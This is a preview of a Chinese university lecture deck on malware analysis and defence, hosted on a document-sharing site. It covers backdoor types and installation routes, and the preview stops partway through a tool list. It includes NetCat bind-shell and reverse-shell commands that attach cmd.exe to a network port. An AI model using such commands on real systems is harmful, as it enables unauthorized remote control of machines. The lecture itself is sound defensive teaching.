- 4
- 0
- 约1.3万字
- 约 63页
- 2019-06-23 发布于广东
- 举报
恶意软件(病毒)的分析与防范 Defence analysis of malware 计算机学院 傅建明 Fujms@ 后门 后门是一个允许攻击者绕过系统中常规安全控制机制的程序,他按照攻击者自己的意图提供通道。 后门的重点在于为攻击者提供进入目标计算机的通道。 后门的类型 本地权限的提升 对系统有访问权的攻击者变换其权限等级成为管理员,然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。 单个命令的远程执行 攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后门执行攻击者的命令并将输出返回给攻击者。 远程命令行解释器访问 正如远程Shell,这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。 远程控制GUI 攻击者可以看到目标计算机的GUI,控制鼠标的移动,输入对键盘的操作,这些都通过网络实现。 后门的安装 自己植入(物理接触或入侵之后) 通过病毒、蠕虫和恶意移动代码 欺骗受害者自己安装 Email 远程共享 BT下载 …… 后门举例 NetCat:通用的网络连接工具 用法一: nc –l –p 5000 –e cmd.exe nc 5000 用法二: nc –l –p 5000 nc 5000 –e cmd.exe cshell.exe 其他Windows下的后门程序 CryptCat T
您可能关注的文档
最近下载
- 2025年国企法务主管岗笔试真题及答案.docx VIP
- 关于绑架的小故事-绑架关起来的故事..docx VIP
- 大学生创新创业基础(创新创业课程)PPT完整全套教学课件.pptx VIP
- 九版内科学肺炎.ppt
- 《病案信息学》期末考试复习题库(汇总版).docx VIP
- 板桥油田板一区块油藏动态分析.pdf VIP
- 2026年昆明滇池国家旅游度假区国有资产投资经营管理(集团)有限责任公司招聘(25人)笔试参考题库及答案解析.docx VIP
- 2023年初级管理会计《专业知识》题库附参考答案(满分必刷).docx
- 2023年GCP考试试卷(网校专用).docx
- 2023一级建造师考试题库含答案【培优b卷】.docx
原创力文档

文档评论(0)